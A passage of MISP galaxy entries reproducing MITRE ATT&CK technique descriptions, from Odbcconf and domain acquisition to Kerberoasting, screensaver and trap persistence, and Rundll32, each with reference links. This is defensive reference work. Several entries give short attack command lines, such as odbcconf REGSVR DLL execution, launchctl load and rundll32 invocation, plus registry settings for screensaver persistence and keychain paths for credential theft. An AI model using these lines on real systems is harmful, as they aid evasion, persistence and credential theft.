https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated

Odbcconf - T1218.008

Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.

Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a <code>REGSVR</code> flag that can be misused to execute DLLs (ex: <code>odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}</code>). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Odbcconf - T1218.008"

Table 3991. Table References
Links
https://attack.mitre.org/techniques/T1218/008
https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017
https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/
https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/
https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/

Domains - T1583.001

Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.

Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)

Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-attack-pattern="Domains - T1583.001"

Table 3992. Table References
Links
https://attack.mitre.org/techniques/T1583/001
https://capec.mitre.org/data/definitions/630.html
https://us-cert.cisa.gov/ncas/alerts/aa20-258a
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/
https://us-cert.cisa.gov/ncas/tips/ST05-016
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
https://threatconnect.com/blog/infrastructure-research-hunting/

Domains - T1584.001

Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.

Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Domains - T1584.001"

Table 3993. Table References
Links
https://attack.mitre.org/techniques/T1584/001
https://www.icann.org/groups/ssac/documents/sac-007-en
https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover

Keychain - T1555.001

Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in <code>~/Library/Keychains/</code>,<code>/Library/Keychains/</code>, and <code>/Network/Library/Keychains/</code>. (Citation: Wikipedia keychain) The <code>security</code> command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.

To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.

The tag is: misp-galaxy:mitre-attack-pattern="Keychain - T1555.001"

Table 3994. Table References
Links
https://attack.mitre.org/techniques/T1555/001
https://en.wikipedia.org/wiki/Keychain_(software)
http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

Launchctl - T1569.001

Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)

Adversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: <code>launchctl load</code>,<code>launchctl unload</code>, and <code>launchctl start</code>. Adversaries can use scripts or manually run the commands <code>launchctl load -w "%s/Library/LaunchAgents/%s"</code> or <code>/bin/launchctl load</code> to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)

The tag is: misp-galaxy:mitre-attack-pattern="Launchctl - T1569.001"

Table 3995. Table References
Links
https://attack.mitre.org/techniques/T1569/001
https://ss64.com/osx/launchctl.html
https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/

Malware - T1587.001

Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)

As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.

Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)

The tag is: misp-galaxy:mitre-attack-pattern="Malware - T1587.001"

Table 3996. Table References
Links
https://attack.mitre.org/techniques/T1587/001
https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/
https://www.losangeles.va.gov/documents/MI-000120-MW.pdf
https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf

Malware - T1588.001

Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.

In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).

The tag is: misp-galaxy:mitre-attack-pattern="Malware - T1588.001"

Table 3997. Table References
Links
https://attack.mitre.org/techniques/T1588/001
https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop

Credentials - T1589.001

Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.

Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Credentials - T1589.001"

Table 3998. Table References
Links
https://attack.mitre.org/techniques/T1589/001
https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/
https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/
https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
https://github.com/dxa4481/truffleHog
https://github.com/michenriksen/gitrob
https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/

Software - T1592.002

Adversaries may gather information about the victim’s host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Software - T1592.002"

Table 3999. Table References
Links
https://attack.mitre.org/techniques/T1592/002
https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
https://threatconnect.com/blog/infrastructure-research-hunting/

Bootkit - T1542.003

Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)

The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.

The tag is: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003"

Table 4000. Table References
Links
https://attack.mitre.org/techniques/T1542/003
https://capec.mitre.org/data/definitions/552.html
https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf
http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion

Firmware - T1592.003

Adversaries may gather information about the victim’s host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).

The tag is: misp-galaxy:mitre-attack-pattern="Firmware - T1592.003"

Table 4001. Table References
Links
https://attack.mitre.org/techniques/T1592/003
https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/

ROMMONkit - T1542.004

Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)

ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.

The tag is: misp-galaxy:mitre-attack-pattern="ROMMONkit - T1542.004"

Table 4002. Table References
Links
https://attack.mitre.org/techniques/T1542/004
https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

Screensaver - T1546.002

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in <code>C:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations.

The following screensaver settings are stored in the Registry (<code>HKCU\Control Panel\Desktop\</code>) and could be manipulated to achieve persistence:

<code>SCRNSAVE.exe</code> - set to malicious PE path
<code>ScreenSaveActive</code> - set to '1' to enable the screensaver
<code>ScreenSaverIsSecure</code> - set to '0' to not require a password to unlock
<code>ScreenSaveTimeout</code> - sets user inactivity timeout before screensaver is executed

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002"

Table 4003. Table References
Links
https://attack.mitre.org/techniques/T1546/002
https://en.wikipedia.org/wiki/Screensaver
https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

WHOIS - T1596.002

Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)

Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="WHOIS - T1596.002"

Table 4004. Table References
Links
https://attack.mitre.org/techniques/T1596/002
https://www.whois.net/

Tool - T1588.002

Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)

Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).

The tag is: misp-galaxy:mitre-attack-pattern="Tool - T1588.002"

Table 4005. Table References
Links
https://attack.mitre.org/techniques/T1588/002
https://www.recordedfuture.com/identifying-cobalt-strike-servers/
https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/

Server - T1583.004

Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.

Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)

The tag is: misp-galaxy:mitre-attack-pattern="Server - T1583.004"

Table 4006. Table References
Links
https://attack.mitre.org/techniques/T1583/004
https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html
https://threatconnect.com/blog/infrastructure-research-hunting/
https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

Botnet - T1583.005

Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)

The tag is: misp-galaxy:mitre-attack-pattern="Botnet - T1583.005"

Table 4007. Table References
Links
https://attack.mitre.org/techniques/T1583/005
https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html
https://www.imperva.com/learn/ddos/booters-stressers-ddosers/
https://krebsonsecurity.com/2017/01/who-is-anna-senpai-the-mirai-worm-author/
https://krebsonsecurity.com/2016/10/hackforums-shutters-booter-service-bazaar/
https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/

Kerberoasting - T1558.003

Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015)

Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)

Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)

This same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003"

Table 4008. Table References
Links
https://attack.mitre.org/techniques/T1558/003
https://capec.mitre.org/data/definitions/509.html
https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
https://adsecurity.org/?p=2293
https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
https://msdn.microsoft.com/library/ms677949.aspx
https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
https://redsiege.com/kerberoast-slides
https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/

Server - T1584.004

Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.

Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).

The tag is: misp-galaxy:mitre-attack-pattern="Server - T1584.004"

Table 4009. Table References
Links
https://attack.mitre.org/techniques/T1584/004
https://threatconnect.com/blog/infrastructure-research-hunting/
https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

Trap - T1546.005

Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.

Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format <code>trap 'command list' signals</code> where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)

The tag is: misp-galaxy:mitre-attack-pattern="Trap - T1546.005"

Table 4010. Table References
Links
https://attack.mitre.org/techniques/T1546/005
https://ss64.com/bash/trap.html
https://bash.cyberciti.biz/guide/Trap_statement

Botnet - T1584.005

Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).

The tag is: misp-galaxy:mitre-attack-pattern="Botnet - T1584.005"

Table 4011. Table References
Links
https://attack.mitre.org/techniques/T1584/005
https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html
https://www.imperva.com/learn/ddos/booters-stressers-ddosers/
https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation

CDNs - T1596.004

Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.

Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).

The tag is: misp-galaxy:mitre-attack-pattern="CDNs - T1596.004"

Table 4012. Table References
Links
https://attack.mitre.org/techniques/T1596/004
https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/

Exploits - T1587.004

Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)

As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.

Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).

The tag is: misp-galaxy:mitre-attack-pattern="Exploits - T1587.004"

Table 4013. Table References
Links
https://attack.mitre.org/techniques/T1587/004
https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html
https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims

Exploits - T1588.005

Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)

In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)

An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.

The tag is: misp-galaxy:mitre-attack-pattern="Exploits - T1588.005"

Table 4014. Table References
Links
https://attack.mitre.org/techniques/T1588/005
https://www.exploit-db.com/
https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage
https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec

Vulnerabilities - T1588.006

Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)

An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).

The tag is: misp-galaxy:mitre-attack-pattern="Vulnerabilities - T1588.006"

Table 4015. Table References
Links
https://attack.mitre.org/techniques/T1588/006
https://nvd.nist.gov/

Rundll32 - T1218.011

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).

Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)

